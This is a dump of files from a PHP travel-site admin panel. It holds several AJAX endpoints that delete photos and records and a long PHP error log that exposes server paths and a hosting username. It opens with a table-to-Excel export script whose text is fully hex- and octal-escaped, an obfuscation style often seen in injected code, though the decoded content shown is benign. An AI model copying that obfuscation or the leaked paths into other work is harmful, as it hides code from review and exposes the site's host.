b\x62\x6f\157\x6b\76\74\x2f\170\x6d\154\76\74\41\x5b\x65\x6e\144\151\146\x5d\55\55\x3e\x3c\155\x65\x74\x61\40\150\x74\x74\160\55\x65\161\165\151\x76\75\42\143\x6f\x6e\164\145\x6e\164\x2d\164\x79\160\145\42\40\x63\157\x6e\164\145\x6e\x74\75\x22\164\145\170\164\57\160\154\x61\151\156\73\40\143\150\x61\162\x73\145\164\x3d\125\x54\106\x2d\70\42\57\x3e\x3c\57\150\x65\x61\x64\76\74\142\x6f\x64\171\76\x3c\x74\x61\x62\154\145\x3e\173\x74\141\x62\154\145\175\x3c\57\164\141\142\154\x65\x3e\x3c\x2f\x62\157\144\171\76\x3c\x2f\x68\164\x6d\x6c\x3e\x27\54\15\xa\x20\x20\40\x20\146\157\x72\155\141\164\x20\75\x20\146\165\x6e\143\x74\151\x6f\x6e\x28\163\54\x20\x63\51\40\x7b\15\12\x20\x20\x20\40\x20\40\40\40\x20\x20\40\x20\162\x65\x74\x75\x72\156\x20\x73\x2e\x72\145\160\154\x61\143\x65\x28\x2f\x7b\x28\x5c\x77\x2b\x29\x7d\x2f\x67\54\40\x66\x75\x6e\x63\164\x69\157\156\x28\155\x2c\x20\160\51\x20\173\15\xa\40\40\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\40\x20\162\x65\x74\x75\162\x6e\x20\143\x5b\160\x5d\73\15\12\x20\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\175\51\xd\12\x20\x20\40\40\40\40\x20\40\x7d\15\12\x20\x20\40\40\x72\145\x74\165\162\156\40\x66\x75\156\x63\164\x69\157\x6e\50\x74\141\x62\154\x65\x2c\x20\156\x61\x6d\145\x29\40\173\15\xa\40\x20\40\40\40\x20\40\x20\151\146\40\x28\41\x74\x61\x62\x6c\x65\56\x6e\157\x64\145\124\x79\160\145\x29\x20\164\141\142\x6c\x65\x20\x3d\40\144\x6f\x63\165\x6d\x65\x6e\x74\56\x67\x65\164\105\154\145\x6d\x65\x6e\164\x42\171\x49\144\x28\164\x61\142\x6c\x65\x29\15\12\40\x20\40\40\40\40\x20\40\166\141\162\x20\143\164\170\40\75\40\x7b\15\12\x20\40\40\x20\40\40\40\x20\40\x20\x20\40\167\x6f\162\x6b\163\x68\x65\145\x74\x3a\40\x6e\141\x6d\145\40\x7c\x7c\x20\x27\x57\x6f\162\x6b\x73\x68\145\x65\x74\x27\x2c\xd\xa\40\x20\40\40\40\40\40\x20\40\x20\40\x20\x74\141\x62\154\x65\x3a\x20\164\x61\142\x6c\x65\56\151\x6e\x6e\x65\162\110\x54\x4d\x4c\56\x72\x65\x70\x6c\141\143\145\50\x2f\74\163\x70\141\156\x28\x2e\52\77\x29\134\x2f\x73\x70\141\156\x3e\40\x2f\x67\x2c\42\42\51\56\x72\x65\x70\154\x61\x63\x65\50\57\x3c\141\134\x62\x5b\x5e\76\x5d\x2a\x3e\50\x2e\52\x3f\51\74\134\57\x61\76\57\147\54\x22\44\61\x22\51\15\xa\x20\x20\40\40\40\40\x20\x20\175\xd\12\11\x9\164\x20\75\40\156\145\167\x20\104\x61\x74\x65\x28\x29\x3b\xd\xa\11\11\146\x69\x6c\145\x6e\141\x6d\x65\x20\x3d\40\47\146\x6d\137\x27\x20\x2b\x20\x74\x2e\x74\x6f\111\123\x4f\123\x74\162\151\x6e\x67\x28\x29\40\x2b\40\x27\x2e\x78\x6c\163\47\xd\xa\11\11\144\157\167\156\x6c\157\141\x64\137\x78\154\x73\50\x66\151\154\x65\x6e\x61\x6d\x65\54\x20\142\x61\163\145\66\x34\137\x65\156\143\157\x64\x65\x28\x66\x6f\162\x6d\141\x74\50\x74\145\155\x70\x6c\141\164\145\x2c\40\143\x74\170\51\51\51\15\12\40\40\x20\40\x7d\xd\xa\175\x29\x28\51\73\xd\12\15\xa\166\x61\x72\40\164\x61\142\x6c\x65\62\105\170\x63\145\154\40\75\40\x66\165\x6e\143\x74\151\x6f\x6e\x20\x28\x29\40\x7b\15\xa\xd\12\x20\40\x20\40\x76\141\x72\x20\165\x61\40\x3d\40\x77\x69\x6e\144\x6f\x77\x2e\156\x61\x76\x69\x67\x61\x74\157\162\x2e\165\163\x65\x72\x41\147\x65\x6e\164\x3b\xd\12\x20\40\x20\40\166\x61\x72\40\x6d\163\151\x65\x20\x3d\x20\x75\141\56\x69\156\144\145\x78\x4f\x66\50\x22\x4d\x53\111\x45\x20\42\x29\x3b\15\xa\15\xa\11\164\x68\x69\x73\56\103\x72\145\x61\x74\145\105\170\x63\x65\154\x53\150\x65\145\x74\x20\75\40\15\xa\11\11\x66\165\156\x63\164\x69\x6f\156\x28\x65\154\54\40\x6e\141\155\x65\x29\x7b\15\12\x9\x9\11\x69\x66\40\50\155\x73\151\145\40\76\40\60\40\174\x7c\40\41\x21\x6e\x61\166\x69\147\141\x74\x6f\x72\x2e\165\x73\x65\162\101\147\145\x6e\x74\56\155\141\164\x63\x68\50\57\x54\x72\151\144\145\156\x74\x2e\x2a\x72\166\134\72\x31\x31\x5c\x2e\x2f\x29\x29\40\173\x2f\x2f\x20\x49\146\40\111\x6e\x74\x65\x72\156\145\x74\x20\105\170\x70\x6c\x6f\x72\x65\x72\xd\12\15\xa\11\x9\x9\x9\x76\x61\162\40\x78\x20\x3d\x20\144\x6f\143\x75\x6d\145\156\x74\56\147\x65\164\x45\154\x65\x6d\x65\x6e\164\102\171\x49\144\x28\x65\x6c\x29\x2e\162\157\167\163\x3b\xd\12\15\12\11\x9\x9\11\x76\141\x72\x20\170\x6c\163\x20\x3d\x20\156\145\167\40\x41\143\164\151\166\145\130\117\142\x6a\x65\x63\164\50\42\105\x78\143\x65\154\x2e\x41\160\160\x6c\x69\143\141\x74\x69\157\156\x22\51\73\xd\xa\xd\12\11\x9\11\11\x78\154\163\x2e\166\x69\x73\x69\x62\x6c\x65\40\x3d\x20\x74\x72\165\145\x3b\15\12\11\11\11\11\x78\x6c\163\x2e\x57\157\x72\x6b\x62\157\157\153\x73\56\x41\x64\x64\xd\12\11\x9\x9\x9\146\x6f\x72\x20\x28\151\x20\x3d\x20\x30\x3b\40\151\40\x3c\40\170\56\x6c\x65\156\x67\x74\150\x3b\x20\151\x2b\x2b\x29\x20\x7b\xd\12\11\11\x9\x9\11\x76\x61\162\40\171\40\x3d\40\x78\x5b\x69\x5d\x2e\x63\x65\154\x6c\163\x3b\15\12\15\12\11\11\11\11\11\x66\157\162\40\50\x6a\40\x3d\x20\60\73\40\x6a\40\74\40\x79\56\154\x65\156\x67\x74\150\73\40\x6a\53\x2b\51\x20\x7b\15\xa\x9\11\11\x9\11\x9\x78\154\x73\x2e\103\145\154\x6c\x73\x28\151\40\x2b\x20\x31\54\40\x6a\x20\53\40\x31\x29\56\x56\x61\x6c\x75\145\x20\x3d\x20\x79\133\152\135\56\x69\x6e\156\145\162\124\x65\170\x74\73\15\12\11\x9\11\x9\x9\175\xd\xa\x9\x9\11\x9\175\15\12\11\x9\11\x9\x78\154\x73\56\x56\x69\x73\x69\x62\154\145\x20\75\40\164\x72\x75\145\x3b\xd\12\11\x9\x9\11\x78\154\x73\x2e\x55\x73\x65\x72\103\157\x6e\x74\162\157\x6c\40\x3d\x20\164\162\165\145\73\15\xa\x9\11\x9\x9\162\x65\x74\x75\162\156\40\x78\154\x73\x3b\xd\12\11\x9\x9\x7d\40\x65\154\163\145\x20\x7b\xd\xa\x9\x9\x9\x9\164\x61\x62\154\x65\124\157\x45\170\143\x65\154\x44\x61\x74\x61\x28\x65\154\x2c\40\156\x61\x6d\x65\51\73\15\12\x9\11\11\x7d\xd\12\x9\11\x7d\xd\xa\175\15\12\x3c\57\x73\x63\162\151\x70\x74\x3e\xd\12\74\x2f\x62\157\144\x79\76\xd\xa\74\x2f\x68\x74\155\154\x3e";
?>ajax/attraction.php000064400000000622150765436130010362 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $ATTRACTION = new Attraction($_POST['id']);
  
    $result = $ATTRACTION->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/service-photo.php000064400000001073150765436130011002 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $SERVICE_PHOTO = new ServicePhoto($_POST['id']);

    unlink('../../../upload/service/gallery/' . $SERVICE_PHOTO->image_name);
    unlink('../../../upload/service/gallery/thumb/' . $SERVICE_PHOTO->image_name);

    $result = $SERVICE_PHOTO->delete();


    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/product.php000064400000000773150765436130007701 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $PRODUCT = new Product($_POST['id']);

    unlink(Helper::getSitePath() . "upload/product-type/product/" . $PRODUCT->image_name);
  

    $result = $PRODUCT->delete();

    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/tour-photo-normal.php000064400000001144150765436130011620 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $TOUR_PACKAGE_PHOTO = new TourPackagePhotosNormal($_POST['id']);

    unlink('../../../upload/tour-package/gallery/' . $TOUR_PACKAGE_PHOTO->image_name);
    unlink('../../../upload/tour-package/gallery/thumb/' . $TOUR_PACKAGE_PHOTO->image_name);

    $result = $TOUR_PACKAGE_PHOTO->delete();


    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/room-photo.php000064400000001073150765436130010316 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $ROOM_PHOTO = new RoomPhoto($_POST['id']);

    unlink('../../../upload/room/gallery/' . $ROOM_PHOTO->image_name);
    unlink('../../../upload/room/gallery/thumb/' . $ROOM_PHOTO->image_name);

    $result = $ROOM_PHOTO->delete();


    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/error_log000064400000202614150765436130007423 0ustar00[19-Feb-2019 23:27:18 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[19-Feb-2019 23:27:18 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[19-Feb-2019 23:27:18 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[19-Feb-2019 23:27:18 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 06:36:51 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 06:36:51 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 06:36:52 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 06:36:52 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 06:36:54 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 06:36:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 06:36:54 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 06:36:54 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 06:36:55 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 06:36:55 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 06:37:19 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 06:37:19 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 06:37:19 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 06:37:19 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/okithmatours/class/Slider.php on line 103
[01-Mar-2019 06:37:19 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:20:16 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 21:20:16 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:20:16 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:20:16 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/okithmatours/class/Slider.php on line 103
[01-Mar-2019 21:20:16 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:21:23 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 21:21:23 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:21:23 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:21:23 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/okithmatours/class/Slider.php on line 103
[01-Mar-2019 21:21:23 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:21:34 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 21:21:34 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:21:34 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:21:34 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/okithmatours/class/Slider.php on line 103
[01-Mar-2019 21:21:34 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:25:28 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/okithmatours/control-panel/auth.php on line 7
[01-Mar-2019 21:25:28 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:25:28 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[01-Mar-2019 21:25:28 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/okithmatours/class/Slider.php on line 103
[01-Mar-2019 21:25:28 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/okithmatours/class/Database.php on line 25
[22-Dec-2022 04:12:15 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:12:15 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:15 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:15 America/New_York] PHP Fatal error:  Class 'AlbumPhoto' not found in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 111
[22-Dec-2022 04:12:20 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:12:20 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:20 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:20 America/New_York] PHP Fatal error:  Class 'AlbumPhoto' not found in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 111
[22-Dec-2022 04:12:23 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:12:23 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:23 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:23 America/New_York] PHP Fatal error:  Class 'AlbumPhoto' not found in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 111
[22-Dec-2022 04:12:41 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:12:41 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:41 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:41 America/New_York] PHP Fatal error:  Class 'AlbumPhoto' not found in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 111
[22-Dec-2022 04:12:56 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:12:56 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:56 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:12:56 America/New_York] PHP Fatal error:  Class 'AlbumPhoto' not found in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 111
[22-Dec-2022 04:13:39 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:13:39 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:13:39 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:13:39 America/New_York] PHP Fatal error:  Class 'AlbumPhoto' not found in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 111
[22-Dec-2022 04:14:43 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:14:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:14:43 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:14:43 America/New_York] PHP Fatal error:  Class 'AlbumPhoto' not found in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 111
[22-Dec-2022 04:42:25 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:42:25 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:25 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:25 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:25 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:42:25 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:30 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:42:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:30 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:42:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:35 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:42:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:35 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:42:35 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:41 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:42:41 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:41 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:41 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:41 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:42:41 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:45 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:42:45 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:45 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:45 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:42:45 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[22-Dec-2022 04:42:45 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:19 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[22-Dec-2022 04:43:19 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[22-Dec-2022 04:43:19 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
